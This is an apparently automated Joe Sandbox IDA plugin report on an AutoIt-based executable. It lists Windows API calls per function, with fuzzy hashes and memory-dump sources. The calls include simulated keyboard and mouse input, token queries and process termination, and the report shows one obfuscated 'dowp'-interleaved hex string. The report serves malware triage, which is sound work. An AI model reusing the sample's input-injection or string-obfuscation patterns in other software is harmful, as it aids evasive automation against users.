                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              • Opcode ID: 642f937eaf146de231839f02788fc9cd2e763ed1a4e9c72e33a26c36b2c0eaba
                                              • Instruction ID: d2949a4e5c03a4deef456a96bd5b2231885b887a12d9fd4ad03d315efd809fc0
                                              • Opcode Fuzzy Hash: 642f937eaf146de231839f02788fc9cd2e763ed1a4e9c72e33a26c36b2c0eaba
                                              • Instruction Fuzzy Hash: 9E51CF30A0120ADFDF21CF68D888BFEBBF5EF45318F1041A9E811972A0D7B48944CB55
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00B5179A
                                              • GetWindowRect.USER32(?,?), ref: 00B517FE
                                              • ScreenToClient.USER32(?,?), ref: 00B5181B
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B5182C
                                              • EndPaint.USER32(?,?), ref: 00B51876
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                              • String ID:
                                              • API String ID: 1827037458-0
                                              • Opcode ID: 9b449d45fa41c0ce08efccdf4a7c26d55db787b5b185721cba39531e1975f957
                                              • Instruction ID: 994753b922fc0c7c573be4b91f44f0a20729186e6ce03f2249413325237545f7
                                              • Opcode Fuzzy Hash: 9b449d45fa41c0ce08efccdf4a7c26d55db787b5b185721cba39531e1975f957
                                              • Instruction Fuzzy Hash: 11419C71504601EFD720DF28CC84FBA7BE8FB4A725F044AA9F9A5872B1D7309849DB61
                                              APIs
                                              • ShowWindow.USER32(00C157B0,00000000,00F921C0,?,?,00C157B0,?,00BDB5A8,?,?), ref: 00BDB712
                                              • EnableWindow.USER32(00000000,00000000), ref: 00BDB736
                                              • ShowWindow.USER32(00C157B0,00000000,00F921C0,?,?,00C157B0,?,00BDB5A8,?,?), ref: 00BDB796
                                              • ShowWindow.USER32(00000000,00000004,?,00BDB5A8,?,?), ref: 00BDB7A8
                                              • EnableWindow.USER32(00000000,00000001), ref: 00BDB7CC
                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00BDB7EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: 048f46d94350afee4b01a53d37d848d5d5012028064a5b3df595478a03a2a2dd
                                              • Instruction ID: 24b4aa5bd017cf438fa5b8801036aff1153e06d18c52c2ce31e9b2ced28d00ce
                                              • Opcode Fuzzy Hash: 048f46d94350afee4b01a53d37d848d5d5012028064a5b3df595478a03a2a2dd
                                              • Instruction Fuzzy Hash: F9416A34605241EFDB26CF24C499FA4BBE0FB45310F1981EAE9598F7A2DB31AC56CB50
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00BC4E41,?,?,00000000,00000001), ref: 00BC70AC
                                                • Part of subcall function 00BC39A0: GetWindowRect.USER32(?,?), ref: 00BC39B3
                                              • GetDesktopWindow.USER32 ref: 00BC70D6
                                              • GetWindowRect.USER32(00000000), ref: 00BC70DD
                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BC710F
                                                • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                              • GetCursorPos.USER32(?), ref: 00BC713B
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BC7199
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                              • String ID:
                                              • API String ID: 4137160315-0
                                              • Opcode ID: 82ceb8e8579bbc831f4d01ebc284cd034b60272532362d23219618507de3f6ae
                                              • Instruction ID: 14b8dd306c441d4070de01a8206e67ee89597a4700b4b1520d330903d0c6ce9e
                                              • Opcode Fuzzy Hash: 82ceb8e8579bbc831f4d01ebc284cd034b60272532362d23219618507de3f6ae
                                              • Instruction Fuzzy Hash: F231C472509306ABD720DF14D849FABB7E9FF88314F04095EF585A7191DB70EA09CB92
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                              • _wcstok.LIBCMT ref: 00BBEC94
                                              • _wcscpy.LIBCMT ref: 00BBED23
                                              • _memset.LIBCMT ref: 00BBED56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                              • String ID: X
                                              • API String ID: 774024439-3081909835
                                              • Opcode ID: 418e0eb40a6cac5524f8abdf77fb18aab1a83404657d081344a87459ba26ff2a
                                              • Instruction ID: 67d0dc75a47dbaf4c1cd542a69943d46c80cbc713d4ee4d5b67083b182488180
                                              • Opcode Fuzzy Hash: 418e0eb40a6cac5524f8abdf77fb18aab1a83404657d081344a87459ba26ff2a
                                              • Instruction Fuzzy Hash: B4C19271608700DFC764EF24D891AAAB7E0EF45311F0449ADF899972A1DB70EC49CB92
                                              APIs
                                                • Part of subcall function 00BA80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA80C0
                                                • Part of subcall function 00BA80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA80CA
                                                • Part of subcall function 00BA80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA80D9
                                                • Part of subcall function 00BA80A9: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00BA80E0
                                                • Part of subcall function 00BA80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA80F6
                                              • GetLengthSid.ADVAPI32(?,00000000,00BA842F), ref: 00BA88CA
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BA88D6
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BA88DD
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00BA88F6
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00BA842F), ref: 00BA890A
                                              • HeapFree.KERNEL32(00000000), ref: 00BA8911
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 169236558-0
                                              • Opcode ID: 1f8a43ba19a3bc3c149f74988447ae0e60dc23925732f2c160f6fc74a02a0c86
                                              • Instruction ID: 203ebe502f0785d35cdb45d5ffb0c1906cc150bf8c878c3a1b4829b3f3d635b0
                                              • Opcode Fuzzy Hash: 1f8a43ba19a3bc3c149f74988447ae0e60dc23925732f2c160f6fc74a02a0c86
                                              • Instruction Fuzzy Hash: A511A271506206FFDB109F94DC19BBFB7B8EB46311F148069E846A7110DB369E00DB60
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00BAB7B5
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BAB7C6
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BAB7CD
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00BAB7D5
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00BAB7EC
                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00BAB7FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: 69162850d5efe96e1cc321cc3e7b622cf659ff3e22550330525815040dfbb9cf
                                              • Instruction ID: afeb44e84722435d4eb4d0c5ddeaef77f87916c628a9951d075e4f943cea4660
                                              • Opcode Fuzzy Hash: 69162850d5efe96e1cc321cc3e7b622cf659ff3e22550330525815040dfbb9cf
                                              • Instruction Fuzzy Hash: 84018475E05209BBEB109FA69C45E5EBFB8EB49311F0040B6FA08A7291EA709D00CF90
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B70193
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B7019B
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B701A6
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B701B1
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B701B9
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B701C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: c7bf2a588459a5419f1edeb0cc022c8c56ff51cff8b920a1c612fd41fe1c6a61
                                              • Instruction ID: 1804d7f480039527574f53bbc24694e7e5885ed3ba8313c06904336b7b48e158
                                              • Opcode Fuzzy Hash: c7bf2a588459a5419f1edeb0cc022c8c56ff51cff8b920a1c612fd41fe1c6a61
                                              • Instruction Fuzzy Hash: 65016CB090275A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BB53F9
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BB540F
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00BB541E
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB542D
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB5437
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BB543E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 0c2b8cbc6ba7358daacf6b40115a410e89ed3f21cbb1d3400ba53ea7800920bc
                                              • Instruction ID: c07c7708ed7d7451ef13a22d4ac9cad6f1b79ffe28fab458b4f8abfbf48e3292
                                              • Opcode Fuzzy Hash: 0c2b8cbc6ba7358daacf6b40115a410e89ed3f21cbb1d3400ba53ea7800920bc
                                              • Instruction Fuzzy Hash: 32F06231146159BBD7205B929C1DEFBBB7CEBC6B11F00016AF905D2050AAA05A01C6B5
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,?), ref: 00BB7243
                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00BB7254
                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00B60EE4,?,?), ref: 00BB7261
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B60EE4,?,?), ref: 00BB726E
                                                • Part of subcall function 00BB6C35: CloseHandle.KERNEL32(00000000,?,00BB727B,?,00B60EE4,?,?), ref: 00BB6C3F
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB7281
                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00BB7288
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: 699d3309991fdd05b713a39ce147e79ef8bfdcdd7f3a6eaca73c677aeb812cc7
                                              • Instruction ID: 72c8298a8768d64e399a1792c620931461bc1d53ba075f0919ca95f33c475e43
                                              • Opcode Fuzzy Hash: 699d3309991fdd05b713a39ce147e79ef8bfdcdd7f3a6eaca73c677aeb812cc7
                                              • Instruction Fuzzy Hash: A1F05E3654A613EBDB112B64ED5CAFAB769EF45702B100572F543A20A0EFB65901CB50
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BC8613
                                              • CharUpperBuffW.USER32(?,?), ref: 00BC8722
                                              • VariantClear.OLEAUT32(?), ref: 00BC889A
                                                • Part of subcall function 00BB7562: VariantInit.OLEAUT32(00000000), ref: 00BB75A2
                                                • Part of subcall function 00BB7562: VariantCopy.OLEAUT32(00000000,?), ref: 00BB75AB
                                                • Part of subcall function 00BB7562: VariantClear.OLEAUT32(00000000), ref: 00BB75B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4237274167-1221869570
                                              • Opcode ID: da3d0d8eec90c04c6524677eff4d0c45f1e1af4397195abe1e232ad0798ca0f6
                                              • Instruction ID: 403c6fb07d8c3c190f8e02b73c9679427244cf13de8c9ce76bcc0865db14b3d5
                                              • Opcode Fuzzy Hash: da3d0d8eec90c04c6524677eff4d0c45f1e1af4397195abe1e232ad0798ca0f6
                                              • Instruction Fuzzy Hash: D0914D75608301DFC710DF24C485E6AB7E4EF89754F1489AEF89A8B361DB31E909CB91
                                              APIs
                                                • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                              • _memset.LIBCMT ref: 00BB2B87
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BB2BB6
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BB2C69
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BB2C97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                              • String ID: 0
                                              • API String ID: 4152858687-4108050209
                                              • Opcode ID: 308ef93af66dfe93477f28803f9bfbe842c9bd3437900ba4cb8418a2ec72ea1c
                                              • Instruction ID: 73612c81f6251382197dc05823bbbc8130b4e4e6190a9e75cd17ffd4c472859b
                                              • Opcode Fuzzy Hash: 308ef93af66dfe93477f28803f9bfbe842c9bd3437900ba4cb8418a2ec72ea1c
                                              • Instruction Fuzzy Hash: 9C51BF716083019BD7249F28D845ABFBBE8EF99310F044AAEF895D7290DBB0CD44D792
                                              APIs
                                              • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00BAD5D4
                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BAD60A
                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BAD61B
                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BAD69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: DllGetClassObject
                                              • API String ID: 753597075-1075368562
                                              • Opcode ID: 36641da74a6549b4a24d665fdbfdcbc80af15184a994c381ee03de441564c012
                                              • Instruction ID: 97e2ff5268dd370ef54419e3cbd90e3cced3c6a465b3373172cacce1faca31b1
                                              • Opcode Fuzzy Hash: 36641da74a6549b4a24d665fdbfdcbc80af15184a994c381ee03de441564c012
                                              • Instruction Fuzzy Hash: FF416CB1604205EFDF05CF68C884AAABBF9EF45310B1581E9AD0A9F615D7B1DE44CBA0
                                              APIs
                                              • _memset.LIBCMT ref: 00BB27C0
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00BB27DC
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00BB2822
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C15890,00000000), ref: 00BB286B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem_memset
                                              • String ID: 0
                                              • API String ID: 1173514356-4108050209
                                              • Opcode ID: ae99d1a32519b63c7124d9b16e4d80b432748c204f762b2ca2ec75a34f79916b
                                              • Instruction ID: 3e4d6623034b5098a32d66aa98a6b5cc475148b2caf3fbda75072e12f2b6dc7b
                                              • Opcode Fuzzy Hash: ae99d1a32519b63c7124d9b16e4d80b432748c204f762b2ca2ec75a34f79916b
                                              • Instruction Fuzzy Hash: 3841B1702043019FD720DF24DC85BAABBE4EF85314F044AADF866972D1DBB0E905CB52
                                              APIs
                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BB0B27
                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00BB0B43
                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00BB0BA9
                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00BB0BFB
                                              Strings
                                              • dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5, xrefs: 00BB0B5D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID: dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5
                                              • API String ID: 432972143-3861665079
                                              • Opcode ID: 0b6350990623ef6f3f2788a1c4a71c1e65f08c0a87c36f5859e2c7909f538a4b
                                              • Instruction ID: 48109fb24797549817fd45d59ea7f7cf3139a1f1ee535f7170efba4231213ccd
                                              • Opcode Fuzzy Hash: 0b6350990623ef6f3f2788a1c4a71c1e65f08c0a87c36f5859e2c7909f538a4b
                                              • Instruction Fuzzy Hash: 98314630D64208AFFB30AB658C05BFFBBE9EB45318F0842DAE491521E1D7F58940D751
                                              APIs
                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00BB0C66
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BB0C82
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00BB0CE1
                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00BB0D33
                                              Strings
                                              • dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5, xrefs: 00BB0C9F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID: dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5
                                              • API String ID: 432972143-3861665079
                                              • Opcode ID: 1288ab0ba291cbce82373cea05a582886ac141b6ee44f6697c2fc0087a9f08ec
                                              • Instruction ID: 832100f5e7d7f930f71154d310cc0199997c4eeb5d8abadb01d496cd5de36c72
                                              • Opcode Fuzzy Hash: 1288ab0ba291cbce82373cea05a582886ac141b6ee44f6697c2fc0087a9f08ec
                                              • Instruction Fuzzy Hash: 513146309642086FFF30AA658814BFFBFE6EB45320F0443ABE881521D1D7B599558751
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BCD7C5
                                                • Part of subcall function 00B5784B: _memmove.LIBCMT ref: 00B57899
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharLower_memmove
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 3425801089-567219261
                                              • Opcode ID: 1af40037b8fc7a5b70512e058ff3ce4bdfe89f1db6f561ea14dbf5ce5506c128
                                              • Instruction ID: 1209f61f1aeef86fa9b874192a678fc8fa7c7f5e7e75e55c3df83074adaf7339
                                              • Opcode Fuzzy Hash: 1af40037b8fc7a5b70512e058ff3ce4bdfe89f1db6f561ea14dbf5ce5506c128
                                              • Instruction Fuzzy Hash: 37319075A04619AFCF00EF54CC51EAEB3F5FF14720B1086AAE825976D1DB31A905CB80
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
